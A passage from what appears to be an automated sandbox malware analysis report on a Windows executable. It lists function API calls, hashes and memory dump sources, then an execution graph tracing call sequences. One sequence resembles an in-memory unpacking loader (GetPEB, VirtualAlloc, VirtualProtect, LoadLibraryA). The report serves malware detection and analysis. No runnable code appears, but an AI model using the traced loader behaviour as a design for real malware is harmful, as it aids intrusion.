                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastMultipleWait$HandlesObjects
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2817213684-0
                                                                                                                                                                                                                                  • Opcode ID: 67f23748c3b61cb067a274dbe642dd452515bfc227d612fc3c487a1f62bebced
                                                                                                                                                                                                                                  • Instruction ID: e620bfc3493872b37b34088112489cb6cf9f9a118c048968b25315905f577a48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67f23748c3b61cb067a274dbe642dd452515bfc227d612fc3c487a1f62bebced
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011C632A1C65582D7548B39F50506EB2B1FB44BA0F541135EA8DC3BA5CF3DE8849B04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF63862C50C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(00007FF63862B813,?,?,?,?,00007FF63862AC4B), ref: 00007FF63862C55C
                                                                                                                                                                                                                                  • RaiseException.KERNEL32(00007FF63862B813,?,?,?,?,00007FF63862AC4B), ref: 00007FF63862C59D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                  • Opcode ID: e11c1d1156c9dddb2ab9c678c25123368fccadaa3a46d84ece72b3ed049504f5
                                                                                                                                                                                                                                  • Instruction ID: ea95979c90254abb6168272b2b1b761ccad9beccc2b5597aebf8d853df8542ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e11c1d1156c9dddb2ab9c678c25123368fccadaa3a46d84ece72b3ed049504f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46116033618B8182EB218F29F44029977E5FB89B94F588270DE8C47758DF3ED561D704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C8CF5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventObjectSingleWait
                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                  • API String ID: 582559000-931675499
                                                                                                                                                                                                                                  • Opcode ID: e22c64d9e76dbcf40433fe56571f9d05964c85f6897a86a8bdf132f0c48186d9
                                                                                                                                                                                                                                  • Instruction ID: c6d2858eb7011121d604f03d2443190a24c0efc32404bd9e0486f677b3f39643
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e22c64d9e76dbcf40433fe56571f9d05964c85f6897a86a8bdf132f0c48186d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEE0D813F1C56202F680BB357D425ED12518F86B90F142531F65E867C7CD2EE041770C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F3FF0 Relevance: 5.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F406E
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F40BE
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F40F3
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F410E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                  • Opcode ID: 5aa4cda33fc5194f8a1b2b6926be0ef662f9fb6268db9e3c9624ff6a2187fdb7
                                                                                                                                                                                                                                  • Instruction ID: e8ab40f33e7d2b909ca1281ab09ddb4522351482e028640bed1eaa7787bffab8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aa4cda33fc5194f8a1b2b6926be0ef662f9fb6268db9e3c9624ff6a2187fdb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED413D33A0CA4281FB90CF30E9405B823A9FF54B95F544136DA4C877A5DF3EE656A348
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385E6E40 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6E8A
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6ECC
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6EF7
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6F18
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                  • Opcode ID: da6822992602bf8f165ef32727c3954354a905e724eeb3c9890d901bceae0b34
                                                                                                                                                                                                                                  • Instruction ID: 6db3442c6d1109d7b26cceddbfb6e2456d401d6608f876f41dd7bfef11696c48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da6822992602bf8f165ef32727c3954354a905e724eeb3c9890d901bceae0b34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE211D23A1894781FF909B34E9443F822A0EF147A4F880632D52C827D9DF7EE59DE318
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:10.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                                  Signature Coverage:13%
                                                                                                                                                                                                                                  Total number of Nodes:1106
                                                                                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                                                                                  execution_graph 20438 5bd003c 20439 5bd0049 20438->20439 20453 5bd0e0f SetErrorMode SetErrorMode 20439->20453 20444 5bd0265 20445 5bd02ce VirtualProtect 20444->20445 20447 5bd030b 20445->20447 20446 5bd0439 VirtualFree 20451 5bd05f4 LoadLibraryA 20446->20451 20452 5bd04be 20446->20452 20447->20446 20448 5bd04e3 LoadLibraryA 20448->20452 20450 5bd08c7 20451->20450 20452->20448 20452->20451 20454 5bd0223 20453->20454 20455 5bd0d90 20454->20455 20456 5bd0dad 20455->20456 20457 5bd0dbb GetPEB 20456->20457 20458 5bd0238 VirtualAlloc 20456->20458 20457->20458 20458->20444 20459 408273 20461 40828f 20459->20461 20460 4082ce 20465 4082d5 20460->20465 20469 40831c 20460->20469 20461->20460 20464 40831c std::_Xfsopen 29 API calls 20461->20464 20466 4082db 20461->20466 20464->20460 20465->20466 20475 40e228 20465->20475 20488 411d32 20469->20488 20471 4082ee 20471->20466 20472 4106ef 20471->20472 20549 41049b 20472->20549 20474 410705 20474->20465 20476 40e234 CallCatchBlock 20475->20476 20477 40e245 20476->20477 20478 40e25a 20476->20478 20647 412381 20 API calls __dosmaperr 20477->20647 20487 40e255 _Xfiopen 20478->20487 20630 40e81d EnterCriticalSection 20478->20630 20480 40e24a 20648 410905 26 API calls _Deallocate 20480->20648 20483 40e276 20631 40e1b2 20483->20631 20485 40e281 20649 40e29e LeaveCriticalSection _Xfiopen 20485->20649 20487->20466 20490 411c71 CallCatchBlock 20488->20490 20489 411c8b 20513 412381 20 API calls __dosmaperr 20489->20513 20490->20489 20492 411cb8 20490->20492 20494 411cca 20492->20494 20495 411cbd 20492->20495 20493 411c90 20514 410905 26 API calls _Deallocate 20493->20514 20505 416499 20494->20505 20515 412381 20 API calls __dosmaperr 20495->20515 20499 411cd3 20501 411ce7 std::_Xfsopen 20499->20501 20502 411cda 20499->20502 20500 411c9b _Xfiopen 20500->20471 20517 411d1b LeaveCriticalSection _Xfiopen 20501->20517 20516 412381 20 API calls __dosmaperr 20502->20516 20506 4164a5 CallCatchBlock 20505->20506 20518 411a06 EnterCriticalSection 20506->20518 20508 4164b3 20519 416533 20508->20519 20512 4164e4 _Xfiopen 20512->20499 20513->20493 20514->20500 20515->20500 20516->20500 20517->20500 20518->20508 20528 416556 20519->20528 20520 4164c0 20533 4164ef 20520->20533 20521 4165af 20538 41704e 20 API calls 3 library calls 20521->20538 20523 4165b8 20539 41629a 20523->20539 20526 4165c1 20526->20520 20545 4175b5 11 API calls 2 library calls 20526->20545 20528->20520 20528->20521 20536 40e81d EnterCriticalSection 20528->20536 20537 40e831 LeaveCriticalSection 20528->20537 20529 4165e0 20546 40e81d EnterCriticalSection 20529->20546 20532 4165f3 20532->20520 20548 411a4e LeaveCriticalSection 20533->20548 20535 4164f6 20535->20512 20536->20528 20537->20528 20538->20523 20540 4162ce _free 20539->20540 20541 4162a5 RtlFreeHeap 20539->20541 20540->20526 20541->20540 20542 4162ba 20541->20542 20547 412381 20 API calls __dosmaperr 20542->20547 20544 4162c0 GetLastError 20544->20540 20545->20529 20546->20532 20547->20544 20548->20535 20550 4104a7 CallCatchBlock 20549->20550 20551 4104b3 20550->20551 20553 4104d9 20550->20553 20574 412381 20 API calls __dosmaperr 20551->20574 20562 40e81d EnterCriticalSection 20553->20562 20555 4104b8 20575 410905 26 API calls _Deallocate 20555->20575 20556 4104e5 20563 4105fb 20556->20563 20559 4104f9 20576 410518 LeaveCriticalSection _Xfiopen 20559->20576 20561 4104c3 _Xfiopen 20561->20474 20562->20556 20564 41061d 20563->20564 20565 41060d 20563->20565 20577 410522 20564->20577 20590 412381 20 API calls __dosmaperr 20565->20590 20568 410612 20568->20559 20570 410640 _Xfiopen 20573 4106bf 20570->20573 20581 40dfcb 20570->20581 20573->20559 20574->20555 20575->20561 20576->20561 20578 410535 20577->20578 20580 41052e _Xfiopen 20577->20580 20579 419800 __fread_nolock 28 API calls 20578->20579 20578->20580 20579->20580 20580->20570 20582 40dfe3 20581->20582 20583 40dfdf 20581->20583 20582->20583 20591 4154e8 20582->20591 20587 419800 20583->20587 20585 40e003 20598 415fa3 62 API calls 5 library calls 20585->20598 20601 419767 20587->20601 20590->20568 20592 4154f4 20591->20592 20593 415509 20591->20593 20599 412381 20 API calls __dosmaperr 20592->20599 20593->20585 20595 4154f9 20600 410905 26 API calls _Deallocate 20595->20600 20597 415504 20597->20585 20598->20583 20599->20595 20600->20597 20610 41e97a 20601->20610 20603 419779 20604 419781 20603->20604 20605 419792 SetFilePointerEx 20603->20605 20623 412381 20 API calls __dosmaperr 20604->20623 20606 4197aa GetLastError 20605->20606 20609 419786 20605->20609 20624 41234b 20 API calls 2 library calls 20606->20624 20609->20573 20611 41e987 20610->20611 20612 41e99c 20610->20612 20625 41236e 20 API calls __dosmaperr 20611->20625 20617 41e9c1 20612->20617 20627 41236e 20 API calls __dosmaperr 20612->20627 20614 41e98c 20626 412381 20 API calls __dosmaperr 20614->20626 20617->20603 20618 41e9cc 20628 412381 20 API calls __dosmaperr 20618->20628 20619 41e994 20619->20603 20621 41e9d4 20629 410905 26 API calls _Deallocate 20621->20629 20623->20609 20624->20609 20625->20614 20626->20619 20627->20618 20628->20621 20629->20619 20630->20483 20632 40e1d4 20631->20632 20633 40e1bf 20631->20633 20635 40dfcb _Xfiopen 62 API calls 20632->20635 20639 40e1cf _Xfiopen 20632->20639 20669 412381 20 API calls __dosmaperr 20633->20669 20637 40e1e8 20635->20637 20636 40e1c4 20670 410905 26 API calls _Deallocate 20636->20670 20650 4165f6 20637->20650 20639->20485 20642 4154e8 _Xfiopen 26 API calls 20643 40e1f6 20642->20643 20654 41637e 20643->20654 20646 41629a _free 20 API calls 20646->20639 20647->20480 20648->20487 20649->20487 20651 40e1f0 20650->20651 20652 41660c 20650->20652 20651->20642 20652->20651 20653 41629a _free 20 API calls 20652->20653 20653->20651 20655 4163a2 20654->20655 20656 41638d 20654->20656 20658 4163dd 20655->20658 20663 4163c9 20655->20663 20674 41236e 20 API calls __dosmaperr 20656->20674 20676 41236e 20 API calls __dosmaperr 20658->20676 20660 416392 20675 412381 20 API calls __dosmaperr 20660->20675 20661 4163e2 20677 412381 20 API calls __dosmaperr 20661->20677 20671 416356 20663->20671 20666 4163ea 20678 410905 26 API calls _Deallocate 20666->20678 20667 40e1fc 20667->20639 20667->20646 20669->20636 20670->20639 20679 4162d4 20671->20679 20673 41637a 20673->20667 20674->20660 20675->20667 20676->20661 20677->20666 20678->20667 20680 4162e0 CallCatchBlock 20679->20680 20690 41e6fd EnterCriticalSection 20680->20690 20682 4162ee 20683 416320 20682->20683 20684 416315 20682->20684 20706 412381 20 API calls __dosmaperr 20683->20706 20691 4163fd 20684->20691 20687 41631b 20707 41634a LeaveCriticalSection __wsopen_s 20687->20707 20689 41633d _Xfiopen 20689->20673 20690->20682 20692 41e97a __wsopen_s 26 API calls 20691->20692 20695 41640d 20692->20695 20693 416413 20708 41e8e9 21 API calls 3 library calls 20693->20708 20695->20693 20696 416445 20695->20696 20698 41e97a __wsopen_s 26 API calls 20695->20698 20696->20693 20699 41e97a __wsopen_s 26 API calls 20696->20699 20697 41646b 20701 41648d 20697->20701 20709 41234b 20 API calls 2 library calls 20697->20709 20702 41643c 20698->20702 20700 416451 FindCloseChangeNotification 20699->20700 20700->20693 20703 41645d GetLastError 20700->20703 20701->20687 20705 41e97a __wsopen_s 26 API calls 20702->20705 20703->20693 20705->20696 20706->20687 20707->20689 20708->20697 20709->20701 20710 416ec2 20711 416ecf 20710->20711 20715 416ee7 20710->20715 20760 412381 20 API calls __dosmaperr 20711->20760 20713 416ed4 20761 410905 26 API calls _Deallocate 20713->20761 20716 416f42 20715->20716 20724 416edf 20715->20724 20762 418c55 21 API calls 2 library calls 20715->20762 20718 4154e8 _Xfiopen 26 API calls 20716->20718 20719 416f5a 20718->20719 20730 41919a 20719->20730 20721 416f61 20722 4154e8 _Xfiopen 26 API calls 20721->20722 20721->20724 20723 416f8d 20722->20723 20723->20724 20725 4154e8 _Xfiopen 26 API calls 20723->20725 20726 416f9b 20725->20726 20726->20724 20727 4154e8 _Xfiopen 26 API calls 20726->20727 20728 416fab 20727->20728 20729 4154e8 _Xfiopen 26 API calls 20728->20729 20729->20724 20731 4191a6 CallCatchBlock 20730->20731 20732 4191ae 20731->20732 20734 4191c6 20731->20734 20829 41236e 20 API calls __dosmaperr 20732->20829 20733 41928c 20836 41236e 20 API calls __dosmaperr 20733->20836 20734->20733 20739 4191ff 20734->20739 20737 4191b3 20830 412381 20 API calls __dosmaperr 20737->20830 20741 419223 20739->20741 20742 41920e 20739->20742 20740 419291 20837 412381 20 API calls __dosmaperr 20740->20837 20763 41e6fd EnterCriticalSection 20741->20763 20831 41236e 20 API calls __dosmaperr 20742->20831 20746 41921b 20838 410905 26 API calls _Deallocate 20746->20838 20747 419213 20832 412381 20 API calls __dosmaperr 20747->20832 20748 419229 20751 419245 20748->20751 20752 41925a 20748->20752 20749 4191bb _Xfiopen 20749->20721 20833 412381 20 API calls __dosmaperr 20751->20833 20764 4192ad 20752->20764 20756 41924a 20834 41236e 20 API calls __dosmaperr 20756->20834 20757 419255 20835 419284 LeaveCriticalSection __wsopen_s 20757->20835 20760->20713 20761->20724 20762->20716 20763->20748 20765 4192d7 20764->20765 20766 4192bf 20764->20766 20768 419641 20765->20768 20771 41931c 20765->20771 20848 41236e 20 API calls __dosmaperr 20766->20848 20869 41236e 20 API calls __dosmaperr 20768->20869 20769 4192c4 20849 412381 20 API calls __dosmaperr 20769->20849 20774 419327 20771->20774 20775 4192cc 20771->20775 20782 419357 20771->20782 20773 419646 20870 412381 20 API calls __dosmaperr 20773->20870 20850 41236e 20 API calls __dosmaperr 20774->20850 20775->20757 20778 419334 20871 410905 26 API calls _Deallocate 20778->20871 20779 41932c 20851 412381 20 API calls __dosmaperr 20779->20851 20783 419370 20782->20783 20784 4193b2 20782->20784 20785 419396 20782->20785 20783->20785 20818 41937d 20783->20818 20855 417a45 20784->20855 20852 41236e 20 API calls __dosmaperr 20785->20852 20787 41939b 20853 412381 20 API calls __dosmaperr 20787->20853 20792 4193a2 20854 410905 26 API calls _Deallocate 20792->20854 20793 41951b 20796 419591 20793->20796 20799 419534 GetConsoleMode 20793->20799 20794 41629a _free 20 API calls 20797 4193d2 20794->20797 20798 419595 ReadFile 20796->20798 20800 41629a _free 20 API calls 20797->20800 20801 419609 GetLastError 20798->20801 20802 4195af 20798->20802 20799->20796 20803 419545 20799->20803 20804 4193d9 20800->20804 20805 419616 20801->20805 20806 41956d 20801->20806 20802->20801 20807 419586 20802->20807 20803->20798 20808 41954b ReadConsoleW 20803->20808 20809 4193e3 20804->20809 20810 4193fe 20804->20810 20867 412381 20 API calls __dosmaperr 20805->20867 20827 4193ad __fread_nolock 20806->20827 20864 41234b 20 API calls 2 library calls 20806->20864 20822 4195d4 20807->20822 20823 4195eb 20807->20823 20807->20827 20808->20807 20814 419567 GetLastError 20808->20814 20862 412381 20 API calls __dosmaperr 20809->20862 20813 419800 __fread_nolock 28 API calls 20810->20813 20813->20818 20814->20806 20815 41629a _free 20 API calls 20815->20775 20816 4193e8 20863 41236e 20 API calls __dosmaperr 20816->20863 20817 41961b 20868 41236e 20 API calls __dosmaperr 20817->20868 20839 421229 20818->20839 20865 418fc9 31 API calls 3 library calls 20822->20865 20825 419602 20823->20825 20823->20827 20866 418e09 29 API calls __fread_nolock 20825->20866 20827->20815 20828 419607 20828->20827 20829->20737 20830->20749 20831->20747 20832->20746 20833->20756 20834->20757 20835->20749 20836->20740 20837->20746 20838->20749 20840 421243 20839->20840 20841 421236 20839->20841 20844 42124f 20840->20844 20873 412381 20 API calls __dosmaperr 20840->20873 20872 412381 20 API calls __dosmaperr 20841->20872 20843 42123b 20843->20793 20844->20793 20846 421270 20874 410905 26 API calls _Deallocate 20846->20874 20848->20769 20849->20775 20850->20779 20851->20778 20852->20787 20853->20792 20854->20827 20856 417a83 20855->20856 20860 417a53 pair 20855->20860 20876 412381 20 API calls __dosmaperr 20856->20876 20858 417a6e RtlAllocateHeap 20859 417a81 20858->20859 20858->20860 20859->20794 20860->20856 20860->20858 20875 412ede 7 API calls 2 library calls 20860->20875 20862->20816 20863->20827 20864->20827 20865->20827 20866->20828 20867->20817 20868->20827 20869->20773 20870->20778 20871->20775 20872->20843 20873->20846 20874->20843 20875->20860 20876->20859 20877 409385 20878 409391 CallCatchBlock 20877->20878 20909 40959e 20878->20909 20880 409398 20881 4094eb 20880->20881 20884 4093c2 20880->20884 21010 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 20881->21010 20883 4094f2 21001 413b51 20883->21001 20893 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 20884->20893 21004 413876 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 20884->21004 20889 4093db 20891 4093e1 20889->20891 21005 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 20889->21005 20894 409462 20893->20894 21006 40e677 39 API calls 5 library calls 20893->21006 20920 409b8d 20894->20920 20910 4095a7 20909->20910 21012 409d1b IsProcessorFeaturePresent 20910->21012 20912 4095b3 21013 40c907 10 API calls 3 library calls 20912->21013 20914 4095b8 20919 4095bc 20914->20919 21014 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20914->21014 20916 4095c5 20917 4095d3 20916->20917 21015 40c930 8 API calls 3 library calls 20916->21015 20917->20880 20919->20880 21016 40b5a0 20920->21016 20922 409ba0 GetStartupInfoW 20923 409468 20922->20923 20924 4137c7 20923->20924 21018 41e1c1 20924->21018 20926 409471 20929 424b3e 20926->20929 20927 4137d0 20927->20926 21022 41e4cb 38 API calls 20927->21022 20930 424b4e _Xfiopen 20929->20930 21024 401b1e 20930->21024 20932 424b7c 21027 403498 20932->21027 20937 401b1e 27 API calls 20938 424bdc 20937->20938 21034 426354 20938->21034 20941 401b1e 27 API calls 20942 424bf5 GetModuleFileNameA 20941->20942 20943 401b1e 27 API calls 20942->20943 20944 424c1f 20943->20944 21054 425ee2 20944->21054 20946 424c2f 20947 401b1e 27 API calls 20946->20947 20948 4250ca 20947->20948 21073 4034e3 20948->21073 20950 4250f4 21081 426504 20950->21081 20952 425233 21144 42612f 20952->21144 20954 4253f6 20955 401b1e 27 API calls 20954->20955 20956 4255c2 20955->20956 21158 40356f 20956->21158 20958 4255df 20959 426504 63 API calls 20958->20959 20960 425666 20959->20960 20961 426504 63 API calls 20960->20961 20964 425840 ___scrt_fastfail 20961->20964 20962 425e40 21187 4019f8 26 API calls 20962->21187 20964->20962 21166 410c91 20964->21166 20969 42586d 21174 426217 CreateFileA 20969->21174 20973 401b1e 27 API calls 20974 4258a7 20973->20974 21177 426260 20974->21177 20977 4258ac 20978 426504 63 API calls 20977->20978 20979 425ac4 ___scrt_fastfail 20978->20979 20987 425bbf 20979->20987 21184 42631a GetTempPathA 20979->21184 20982 426217 3 API calls 20983 425ba3 20982->20983 20984 401b1e 27 API calls 20983->20984 20983->20987 20985 425bba 20984->20985 